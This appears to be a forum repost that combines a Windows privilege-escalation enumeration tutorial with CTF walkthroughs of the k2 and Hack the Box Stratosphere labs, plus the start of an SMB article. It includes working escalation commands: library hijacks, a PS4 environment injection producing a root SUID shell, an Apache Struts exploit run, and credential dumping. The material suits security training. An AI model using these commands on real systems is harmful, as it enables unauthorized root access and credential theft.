05-14-2020, 09:40 AM
Table of Contents
- Introduction
- Vectors of Privilege Escalation
- Windows-Exploit-Suggester
- Windows Gather Applied Patches
- Sherlock
- JAWS – Just Another Windows (Enum) Script
- PowerUp
Privilege escalation is the phase that follows the initial compromise of the victim's machine: the attacker gathers critical information about the system, such as stored passwords and weakly configured services or applications, and uses it to choose the post-exploitation step that yields a higher-privileged shell.
Vectors of Privilege Escalation
The following information is considered critical on a Windows system:
- The version of the operating system
- Any Vulnerable package installed or running
- Files and Folders with Full Control or Modify Access
- Mapped Drives
- Potentially Interesting Files
- Unquoted Service Paths
- Network Information (interfaces, arp, netstat)
- Firewall Status and Rules
- Running Processes
- AlwaysInstallElevated Registry Key Check
- Stored Credentials
- DLL Hijacking
- Scheduled Tasks
Windows-Exploit-Suggester
If you have a low-privilege Meterpreter or command session on the victim, you can use the Local Exploit Suggester.
This module suggests local Meterpreter exploits that can be used. The suggestions are based on the architecture and platform on which the user has a shell open, as well as the exploits available in Metasploit. Note that not all local exploits will be fired: exploits are chosen based on session type, platform, architecture and required default options.
use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > set lhost 192.168.1.107
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > exploit
As you can observe, it has suggested several local exploits to which the target appears vulnerable and which can provide a higher-privileged shell.
![[Image: 0.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-QRghhYjshqo/W5NiLTYyMSI/AAAAAAAAaJw/44zzVMg3BVsv2C5NxI3KUvNy_SQ_9xW1QCEwYBhgL/s1600/0.png?w=687)
Windows Gather Applied Patches
This module attempts to enumerate which patches are applied to a Windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.
use post/windows/gather/enum_patches
msf post(enum_patches) > set session 1
msf post(enum_patches) > exploit
As you can observe, it has also reported that the target is possibly vulnerable to a recommended exploit that can provide a higher-privileged shell.
![[Image: 1.1.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-28xri2-XHTQ/W5NiLUCzWGI/AAAAAAAAaJ8/p-gFG16RJ2oqqHExDLqEfF3Wisy37NS4gCEwYBhgL/s1600/1.1.png?w=687)
Sherlock
Sherlock is a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. Like the post module above, it reports that the target is possibly vulnerable to a recommended exploit that can provide a higher-privileged shell.
Download it from GitHub with the following command; it is executed once you have a Meterpreter session on the victim.
git clone https://github.com/rasta-mouse/Sherlock.git
![[Image: 2.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-cyDgzuyudao/W5NiMtFJ3gI/AAAAAAAAaJ0/inewhKT9qaAjmjCI3Wg93N2wzhLtveG1ACEwYBhgL/s1600/2.png?w=687)
Since the script must run in PowerShell, load the Meterpreter PowerShell extension and then import the downloaded script.
load powershell
![[Image: 1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-m-akDc4Zf94/W5NiLk_CijI/AAAAAAAAaJw/UX1fJo_-D08KOagH32KciTjXdnJuVDRXwCEwYBhgL/s1600/1.png?w=687)
powershell_import '/root/Desktop/Sherlock/Sherlock.ps1'
powershell_execute "find-allvulns"
The above command reports that the target is possibly vulnerable to a recommended exploit that can be used to achieve a higher-privileged shell.
![[Image: 3.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-rQ2WgZtRrDA/W5NiM0fRm8I/AAAAAAAAaJs/L0681AuLhZQ2FIdJRIyw3b0YE9yxXW8AACEwYBhgL/s1600/3.png?w=687)
JAWS – Just Another Windows (Enum) Script
JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written in PowerShell 2.0, so it "should" run on every Windows version since Windows 7.
Current Features
- Network Information (interfaces, arp, netstat)
- Firewall Status and Rules
- Running Processes
- Files and Folders with Full Control or Modify Access
- Mapped Drives
- Potentially Interesting Files
- Unquoted Service Paths
- Recent Documents
- System Install Files
- AlwaysInstallElevated Registry Key Check
- Stored Credentials
- Installed Applications
- Potentially Vulnerable Services
- MuiCache Files
- Scheduled Tasks
git clone https://github.com/411Hall/JAWS.git
![[Image: 4.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-cWaIma4OKXE/W5NiNIpoHMI/AAAAAAAAaJw/FPtnrz8sUmUvRww3ekFUEGsCjVML3vZVACEwYBhgL/s1600/4.png?w=687)
Once you have a Meterpreter shell, upload the downloaded script and run it from the command shell:
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
![[Image: 5.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-sUTQ9NxyM90/W5NiNAWqAyI/AAAAAAAAaJ0/YJRPDSxnEygtt8O8M5ceOuTrAF0CC14QACEwYBhgL/s1600/5.png?w=687)
It stores the gathered information in a text file named "JAWS-Enum.txt".
Since that file should now hold the vectors that can lead to privilege escalation, let's open it and examine the results.
In the following image, you can observe that it lists all user names and the IP configuration.
![[Image: 6.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-8BKv7cWVqP0/W5NiNqb88TI/AAAAAAAAaJ0/87G99h4XhgIQbEgSKIs7FV5Xol1MbbhIwCEwYBhgL/s1600/6.png?w=687)
In this image, we can clearly observe the netstat output.
![[Image: 7.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-Rwq5JwHNJXE/W5NiNqU4NAI/AAAAAAAAaJ8/9izoZcFFgZAYFAMwF_FvzQQpMRojXcxkACEwYBhgL/s1600/7.png?w=687)
In this image, we can clearly observe the running processes and services.
![[Image: 8.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Z83rJQVVPfk/W5NiN0-x37I/AAAAAAAAaJ4/FsZ6rPgPaP0kvhd-X_-K2L71khUCIOiSgCEwYBhgL/s1600/8.png?w=687)
In this image, we can clearly observe all installed programs and patches.
![[Image: 9.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-Bw-mm3Ngw-U/W5NiOAWfX4I/AAAAAAAAaKA/DtbHa9GnafcoaOnBXIde-4EmOUnFffSnACEwYBhgL/s1600/9.png?w=687)
In this image, we can clearly observe the folders with Full Control or Modify access; much more information can be extracted by running this script.
![[Image: 10.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-NrHQaNz07_8/W5NiMNrH84I/AAAAAAAAaJo/cQdAK5n_lbw-uXZ0n8vdXdOFvrznJ6PHACEwYBhgL/s1600/10.png?w=687)
PowerUp
PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfiguration.
Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.
Current Features
Service Enumeration:
- Get-ServiceUnquoted: returns services with unquoted paths that also have a space in the name.
- Get-ModifiableServiceFile: returns services where the current user can write to the service binary path or its config.
- Get-ModifiableService: returns services the current user can modify.
- Get-ServiceDetail: returns detailed information about a specified service.
- Invoke-ServiceAbuse: modifies a vulnerable service to create a local admin or execute a custom command.
- Write-ServiceBinary: writes out a patched C# service binary that adds a local admin or executes a custom command.
- Install-ServiceBinary: replaces a service binary with one that adds a local admin or executes a custom command.
- Restore-ServiceBinary: restores a replaced service binary with the original executable.
- Find-ProcessDLLHijack: finds potential DLL hijacking opportunities for currently running processes.
- Find-PathDLLHijack: finds service %PATH% DLL hijacking opportunities.
- Write-HijackDll: writes out a hijackable DLL.
- Get-RegistryAlwaysInstallElevated: checks if the AlwaysInstallElevated registry key is set.
- Get-RegistryAutoLogon: checks for Autologon credentials in the registry.
- Get-ModifiableRegistryAutoRun: checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns.
git clone //github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
ls
cd Privesc
ls
![[Image: 11.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-ZOc4nKFDWV8/W5NiMdPGBOI/AAAAAAAAaJo/df2JHHrAN8MvFb1AWv2chnLV20r4-GpGwCEwYBhgL/s1600/11.png?w=687)
Again, load PowerShell and then import the downloaded script.
load powershell
powershell_import '/root/Desktop/PowerSploit/Privesc/PowerUp.ps1'
powershell_execute Invoke-AllChecks
The output shows the misconfigurations the target is possibly vulnerable to, each with a recommended abuse function that could be used to achieve a higher-privileged shell.
![[Image: 12.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-kz7kvVxTmDQ/W5NiMt63lCI/AAAAAAAAaJ4/c3gdsrb7HJ863SFUB5_aatkJKFVtE0oXQCEwYBhgL/s1600/12.png?w=687)
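The unquoted-service-path check that PowerUp's Get-ServiceUnquoted (and JAWS) performs can be reproduced in a few lines. The Python below is an added example, not PowerUp's own code: it takes constructed ImagePath values, lists the intermediate executables Windows would try before the real binary, and produces the quoted form that fixes the service.

```python
import re

# Service definitions as they would be read from the registry ImagePath value
# or from "sc qc <name>"; constructed sample data, not from a real host.
SAMPLE_SERVICES = {
    "GoodSvc": r'"C:\Program Files\Vendor Tools\agent.exe" --service',
    "BadSvc": r"C:\Program Files\Vendor Tools\agent.exe --service",
    "SysSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
}


def split_image_path(image_path: str):
    """Split an unquoted ImagePath into (executable, arguments).

    The executable is taken to end at the first '.exe' token; everything
    after it is treated as service arguments.
    """
    m = re.match(r"(.*?\.exe)(.*)$", image_path, re.IGNORECASE | re.DOTALL)
    if not m:
        return image_path, ""
    return m.group(1), m.group(2)


def unquoted_service_candidates(image_path: str) -> list:
    """Return the executables CreateProcess would try before the real binary.

    This is the condition Get-ServiceUnquoted reports: the path is not quoted
    and a directory name contains a space, so the service control manager
    first tries each prefix that ends at a space, as '<prefix>.exe'.
    An empty list means the path is safe (quoted, or no space in the path).
    """
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []
    exe, _ = split_image_path(path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def quote_image_path(image_path: str) -> str:
    """Remediation: wrap the executable part in double quotes, keep arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    exe, args = split_image_path(path)
    return f'"{exe}"{args}'


def audit_services(services: dict) -> dict:
    """Map each vulnerable service name to the hijack candidates it exposes.

    A finding is only exploitable if a low-privileged user can create a file
    at one of the candidate paths, so a real audit also checks the ACL of each
    parent directory (PowerUp does this); that filesystem check is out of
    scope for this offline example.
    """
    return {name: cands for name, path in services.items()
            if (cands := unquoted_service_candidates(path))}


if __name__ == "__main__":
    for name, cands in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path; executables tried first:")
        for c in cands:
            print("   ", c)
        print("    fix:", quote_image_path(SAMPLE_SERVICES[name]))
```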
Hello friends! Today we are going to take on another CTF challenge known as /dev/random: k2. Credit for making this VM goes to "Sagi-"; it is another boot2root challenge in which our goal is to get root. The VM is available for download, and we are given credentials to log in to it (user: password).
Let us start by finding the IP of the VM (here it is 192.168.199.138, but you will have to find your own).
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-_jHzDWV67-U/W5IQ0HtciwI/AAAAAAAAaIY/m5PqN6XenwEsbPf9CBiFN5NeR5OBPHdEgCEwYBhgL/s1600/1.png?w=687&ssl=1)
We use the given credentials to log in through SSH. After logging in we check the sudoers list and find that we can run /bin/calc as user "user2".
ssh user@192.168.199.138
sudo -l
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pND7zEiXK_I/W5IQ2WU4iAI/AAAAAAAAaIY/gIj05LS6Pjkco00Br4oJN7qldZnYhWUAACEwYBhgL/s1600/2.png?w=687&ssl=1)
We use strace to debug the binary and check for missing files or dependencies. We find that a shared object called libcalc.so is missing from the /home/user/.config/ directory.
strace /bin/calc 2>&1 | grep -i -E "open|access"
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-t1Kwnupcx_8/W5IQ2rlekSI/AAAAAAAAaIU/wD3X7LLUTHg9AF3IYweeKQ3t1d1CcV2FQCEwYBhgL/s1600/3.png?w=687&ssl=1)
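As an added example (not part of the original write-up), this Python parser runs the same check over constructed strace output: it keeps only failed open/openat/access calls for shared objects and reports those probed in user-writable directories, which is the condition that lets a missing library such as libcalc.so above be supplied by an unprivileged user. The sample lines, prefix list and regexes are my own assumptions.

```python
import re

# strace output as produced by: strace /bin/calc 2>&1 | grep -i -E "open|access"
# Constructed sample modelled on the lookup described above; not a real capture.
SAMPLE_TRACE = """\
execve("/bin/calc", ["/bin/calc"], 0x7ffd5a3b1c40 /* 20 vars */) = 0
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/home/user/.config/libcalc.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/tls/libcalc.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
""".splitlines()

# A failed lookup, as strace prints it for open/openat/access.
_FAILED_LOOKUP = re.compile(
    r'^(?P<call>open|openat|access)\('
    r'(?:AT_FDCWD,\s*)?"(?P<path>[^"]+)"[^)]*\)\s*=\s*-1\s+ENOENT'
)
# Shared-object file names: libfoo.so, libfoo.so.6, libfoo.so.1.2
_SHARED_OBJECT = re.compile(r"\.so(?:\.\d+)*$")
# Directories an unprivileged user can normally create files in.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def hijackable_library_lookups(trace_lines) -> list:
    """Return (path, syscall) for every missing shared object that the traced
    program searched for in a user-writable location.

    The loader probing system directories (e.g. /lib/.../tls/) and failing is
    normal. A binary that runs with elevated rights (SUID, or via sudo as in
    this box) probing a home or tmp directory is the misconfiguration, because
    whoever can write there can supply the library. Relative paths are
    reported too: they resolve against the caller's current directory.
    """
    findings = []
    for line in trace_lines:
        m = _FAILED_LOOKUP.match(line.strip())
        if not m:
            continue
        path = m.group("path")
        if not _SHARED_OBJECT.search(path):
            continue
        if path.startswith(USER_WRITABLE_PREFIXES) or not path.startswith("/"):
            findings.append((path, m.group("call")))
    return findings


if __name__ == "__main__":
    for path, call in hijackable_library_lookups(SAMPLE_TRACE):
        print(f"{call}: {path} is missing and lives in a user-writable location")
```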
We check the /home directory and find that the user directory grants all permissions to the owner only. We give read and execute permission to the group and others, then create a directory called .config so that we can place our shared object inside it.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-6fsdvJS-H04/W5IQ2g_pGuI/AAAAAAAAaIc/Q8aGQzalGL0hOg0YeqBbdzDlYS83KeKmACEwYBhgL/s1600/4.png?w=687&ssl=1)
We write a small C file that copies /bin/bash into the /tmp directory, sets the SUID bit on the copy and runs it.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-aAwvuLxJUsY/W5IQ2_itGLI/AAAAAAAAaIc/N4Wf-TN4Pjo-Lx0JNk3RzHqg7T4gxaehQCEwYBhgL/s1600/5.png?w=687&ssl=1)
We save the file as libcalc.c, compile it as a shared object, and run /bin/calc as user2. As soon as the application runs we check id and find that we have successfully spawned a shell as user2.
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
sudo -u user2 /bin/calc
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-hNV2Yr1nsaU/W5IQ3D6moOI/AAAAAAAAaIg/RSc-6GzIODcJ2g7H3FtEpJvwD8fhJPFywCEwYBhgL/s1600/6.png?w=687&ssl=1)
After spawning a shell as user2, we enumerate the machine and find a cron job that runs a file called /sbin/bckup as user3.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Ck8L2dLGZEE/W5IQ3O108lI/AAAAAAAAaIo/GKbC8lcfzwILYzyMGtrzPcoq1khnId02gCEwYBhgL/s1600/7.png?w=687&ssl=1)
We check the content of this file and find that it is a Ruby script that creates a zip file in the /tmp/ directory.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-DtV19nr8V9E/W5IQ3bPpYRI/AAAAAAAAaIk/KrHUdA6tXWQgMu3Ke_PS797DyjjKb6IhACEwYBhgL/s1600/8.png?w=687&ssl=1)
We check the zip library that this Ruby script uses and find that we can write to the file.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-681Lkoc6rhw/W5IQ3pJ2KwI/AAAAAAAAaIk/e_SmwiloIY0_VRNs1jthNR3GboSZ7g2lQCEwYBhgL/s1600/9.png?w=687&ssl=1)
We change the content of the file, adding a bash command that copies /bin/bash to the /tmp/ directory as bash2 and sets the SUID bit.
echo '`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`' > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-mJ0mAStPAZA/W5IQ0LufANI/AAAAAAAAaIo/oRSlCuYo7JgMRNEX9G1B-uZlFBeu62UaQCEwYBhgL/s1600/10.png?w=687&ssl=1)
We wait for some time and go to the /tmp/ directory, where we find that bash2 has been created by user3. We run the new bash binary and successfully spawn a shell as user3.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-rKIvjmjA7PE/W5IQ0YEpcSI/AAAAAAAAaIo/oOqHFw5pY10egarU49V_7PhgkHGlEd-mQCEwYBhgL/s1600/11.png?w=687&ssl=1)
As we only have the effective user id of user3 and not the real user id, we create a C program that spawns a shell with user3's uid and gid.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-xO8VOHXzgSM/W5IQ08wwbBI/AAAAAAAAaIQ/KO0fR0GhBIsKt0frDhBAiLfscDKvjeVAwCEwYBhgL/s1600/12.png?w=687&ssl=1)
We compile the program and run it. After running it, we successfully spawn a shell with user3's uid and gid.
gcc bash3.c -o bash3
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Ls30fE_fDhg/W5IQ1IUSLLI/AAAAAAAAaIg/SyW7OsRUbrIMcLKbLHFif4SdBVychikkQCEwYBhgL/s1600/13.png?w=687&ssl=1)
Now we search for files with the SUID bit set and find a file called "whoisme" in the /usr/local/bin/ directory.
find / -perm -4000 2>/dev/null
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Z4sdO95Cwos/W5IQ1RTivrI/AAAAAAAAaIY/798yX6Cue2Yqw-236H2Uik27P0RUNMeYwCEwYBhgL/s1600/14.png?w=687&ssl=1)
When we run the file it outputs the string "user". When we check the binary with the strings command we find that it calls setuid, system, setgid and the logname command.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Q8j6OWxRNq8/W5IQ1dA-SbI/AAAAAAAAaIk/E0bnywBF1hs2l8gAzL_IkQg897_IeH_CgCEwYBhgL/s1600/15.png?w=687&ssl=1)
We run the binary with a clean environment, using the SHELLOPTS and PS4 variables so that the shell it spawns copies /bin/bash to the /tmp/ directory as bash4, changes its ownership to root and sets the SUID bit.
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)' /bin/sh -c '/usr/local/bin/whoisme'
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-cNhTbdGEAbQ/W5IQ1sud5QI/AAAAAAAAaIg/-upha1bThtU2_7I5Wa_CjU3Vtg6_EyQ_QCEwYBhgL/s1600/16.png?w=687&ssl=1)
As soon as we run it we find our copied bash binary. We run it and spawn a shell as root. We go to the root directory and find a file called flag.txt.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-m3wZfINli4o/W5IQ19G4sPI/AAAAAAAAaIQ/8XoKXGe6ww0C9o62ztwUfNlVUzQoAPN9QCEwYBhgL/s1600/17.png?w=687&ssl=1)
We take a look at the content of the file and find our congratulatory flag.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-LsY0QiHRPms/W5IQ2Iz1hcI/AAAAAAAAaIY/d6TSkt8SCD4aOlIiWvLpWn1nf5XKF-w0wCEwYBhgL/s1600/18.png?w=687&ssl=1)
Hello friends!! Today we are going to solve another CTF challenge, "Stratosphere", a lab presented by Hack the Box and available online for those who want to improve their penetration-testing and black-box testing skills. Stratosphere is a retired vulnerable lab; Hack the Box offers a collection of such labs as challenges, from beginner to expert level, so you can practise according to your experience.
Level: Easy
Task: find user.txt and root.txt file in the victim’s machine.
WalkThrough
Since these labs are available online, they have static IPs. The IP of Stratosphere is 10.10.10.64.
Let’s start off with scanning the network to find our target.
nmap -sV 10.10.10.64
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-as6As5ZJ1A4/W46eHOB2PUI/AAAAAAAAaCk/tWQV1GAFM5AECywvye114Da4aO82jHvtwCEwYBhgL/s1600/1.png?w=687&ssl=1)
As per nmap, port 80 is open for HTTP, so let's explore the target IP in the browser. On port 80 we were welcomed by the following page, where we didn't find any informative clue.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-r_Jt8tYS1wM/W46eIJGpYII/AAAAAAAAaC0/Dzo-1-jmiwIL2n0RgJTqUqt9xbmceXGlwCEwYBhgL/s1600/2.png?w=687&ssl=1)
Then we visit port 8080 (HTTP proxy) and get the same web page there. We inspect the source code of both pages but find nothing.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-2rzGlTuW7cE/W46eIkrcElI/AAAAAAAAaC4/lvTTZ_n9HBoEHGGFfvjLYjNGs8fwxswrgCEwYBhgL/s1600/3.png?w=687&ssl=1)
Therefore we next run a directory brute-force attack with DirBuster, using the wordlist "directory-list-2.3-medium.txt".
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-iORD8NN1qZg/W46eI5KU9lI/AAAAAAAAaDA/xumQpo1nnaYnn0PVjgRFx_xeshzy6mKuQCEwYBhgL/s1600/4.png?w=687&ssl=1)
Luckily it found some web directories, such as /Monitoring; let's explore it in the browser.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-td6ah1M-_Pg/W46eI8pAbeI/AAAAAAAAaDg/C9GA9AsoYSYS8d1zo2S7RjI0vSl2zrVyACEwYBhgL/s1600/5.png?w=687&ssl=1)
When we open the /Monitoring URL, it redirects to a login page. I looked closely at the URL, which ends in an .action extension, so I searched Google for information about this extension. I found that the .action extension is used by Apache Struts 2, which has a history of bugs and vulnerabilities; if you search for its exploits, you will find many Python scripts and exploits for this service.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-8YHF3DZamF4/W46eJ7y0NqI/AAAAAAAAaDk/QMHlFKOVqnUMcuvY-TA0pGSyQEmYDhwdQCEwYBhgL/s1600/6.png?w=687&ssl=1)
So we used an nmap script to check whether it is vulnerable:
nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
Awesome!!! It is vulnerable to CVE-2017-5638; let's exploit it.
![[Image: 7.1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-sV8O-6ibbM8/W46eJyJk6cI/AAAAAAAAaDk/NNN0ZmSL3pE8kwcPCz6hE7_qhL_KwM5mwCEwYBhgL/s1600/7.1.png?w=687&ssl=1)
I found an exploit pack, Struts-Apache-ExploitPack; let's download it from GitHub and give the script full permissions.
git clone
cd Struts-Apache-ExploitPack
cd Exploiter
ls
chmod 777 Exploit.sh
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ub6tK7VqcsA/W46eJyMARtI/AAAAAAAAaDg/7v4VFkGtP749uO-UeTFw8dzKQetJkOfhgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Now run the following command to exploit the victim machine, then look around:
./Exploit.sh
id
ls
cat db_connect
Username: admin
Password: admin
![[Image: 8.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-MCR0Z1M1k08/W46eKUwyiXI/AAAAAAAAaDs/Mm0AeqdxAiMbMMRY9CCycA1FiCFX5iN2wCEwYBhgL/s1600/8.1.png?w=687&ssl=1)
Now that we have database credentials, let's use them to dump everything from the database.
mysqldump -u admin -padmin --all-databases --skip-lock-tables
Here I found the password "9tc*rhKuG5TyXvUJOrE^5CK7k" for user Richard; now let's try to connect over SSH with these credentials.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-wziYRgPRxpU/W46eK7WhGVI/AAAAAAAAaDo/vPs4s55xIRkJd42LpcfR8QEJMWs50FkLgCEwYBhgL/s1600/8.png?w=687&ssl=1)
ssh richard@10.10.10.64
Yuppie! We successfully logged in to the victim's machine, so now let's get user.txt and root.txt.
ls
cat user.txt
cat test.py
Here we notice that test.py computes some hash values and, at the end, hands over success.py from inside the root directory; the whole script depends on hashlib.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ZbQnPIinEhk/W46eK45p38I/AAAAAAAAaDs/D1CYL9D1psoQe1t1ooRH4C8CuAYDZwybgCEwYBhgL/s1600/9.png?w=687&ssl=1)
We also check Richard's sudo rights and find that he is allowed to run Python scripts with sudo. So first we run test.py and start solving the hashes in order to reach success.py.
sudo /usr/bin/python /home/richard/test.py
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-dBjVEGEe1f0/W46eHXUBcFI/AAAAAAAAaDs/MXBTaGQL1zA7QcGPrLBAPh0ooLBZuixJgCEwYBhgL/s1600/10.png?w=687&ssl=1)
So we got the hash value; now we need to decode it, and after decoding I found "kayboo!".
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-woJdjuT46JM/W46eHKpCJ-I/AAAAAAAAaDs/JQI-fcaZGX4zAU2IriK0TZnnFvcnwxPsACEwYBhgL/s1600/11.png?w=687&ssl=1)
On submitting the decoded text, it generated a new hash for the next step; I decoded that one and submitted the answer, and again a new hash appeared, the same process repeating every time a decoded value was submitted.
Since test.py imports hashlib, a Python library, my last option was Python library hijacking to escalate to root.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-4xsiPzdPxVc/W46eH2M504I/AAAAAAAAaDk/ZcWjz75jD3M-W3vq7a2f9cfdUQrtS7mBwCEwYBhgL/s1600/12.png?w=687&ssl=1)
Therefore I create a hashlib.py script in the current directory that executes the system binary /bin/bash; when test.py now runs, it imports this hashlib.py, which calls /bin/bash.
echo 'import os;os.system("/bin/bash")' > hashlib.py
sudo /usr/bin/python /home/richard/test.py
Boom!!! Here we have root access; now let's get the root.txt file and finish this task.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-riLsBFtMJtY/W46eIKKuIrI/AAAAAAAAaDs/ca08UTOV6KEY3VvH16XYBYv21xxRb4RmQCEwYBhgL/s1600/13.png?w=687&ssl=1)
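The hijack works because running `python /home/richard/test.py` puts the script's own directory first on sys.path, ahead of the standard library. As an added example (not from the original write-up), the Python below audits a script for exactly this condition: it parses the script's imports and reports any standard-library module that a file beside the script would shadow. The temp-directory scenario in demo() is constructed.

```python
import ast
import os
import sys
import sysconfig
import tempfile

STDLIB_DIR = sysconfig.get_paths()["stdlib"]


def is_stdlib_module(name: str) -> bool:
    """True if `name` is a builtin or a module/package in the stdlib directory."""
    if name in sys.builtin_module_names:
        return True
    base = os.path.join(STDLIB_DIR, name)
    return os.path.isfile(base + ".py") or os.path.isfile(os.path.join(base, "__init__.py"))


def imported_modules(source: str) -> list:
    """Top-level module names a script imports ('import a.b' -> 'a')."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def shadowed_stdlib_imports(script_path: str) -> list:
    """Return (module, shadow_file) for stdlib imports that a same-named file
    beside the script would satisfy first.

    'python script.py' places the script's directory at sys.path[0], ahead of
    the standard library, so whoever can write to that directory controls
    every stdlib module the script imports. A sudo rule that runs a script
    out of the invoking user's home directory therefore hands that user root;
    the fix is a root-owned, non-writable script directory (or -I/-E flags).
    """
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path, encoding="utf-8") as fh:
        names = imported_modules(fh.read())
    findings = []
    for name in names:
        if not is_stdlib_module(name):
            continue
        for candidate in (os.path.join(script_dir, name + ".py"),
                          os.path.join(script_dir, name, "__init__.py")):
            if os.path.isfile(candidate):
                findings.append((name, candidate))
                break
    return findings


def demo() -> list:
    """Constructed scenario: test.py importing hashlib beside a planted hashlib.py."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "test.py")
        with open(script, "w", encoding="utf-8") as fh:
            fh.write("import hashlib\nprint(hashlib.sha256(b'x').hexdigest())\n")
        with open(os.path.join(tmp, "hashlib.py"), "w", encoding="utf-8") as fh:
            fh.write("# constructed stand-in for a planted module; never imported here\n")
        return [name for name, _ in shadowed_stdlib_imports(script)]


if __name__ == "__main__":
    print("shadowed stdlib modules:", demo())
```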
In this article, we will learn how to connect to a victim's machine via SMB (port 445) once you have collected a username and password for it. Our earlier articles cover how to collect usernames and passwords from a remote host over SMB, and what the SMB protocol is.
Table of Contents
Exploiting Windows Server 2008 R2 via SMB through Metasploit inbuilt exploits:
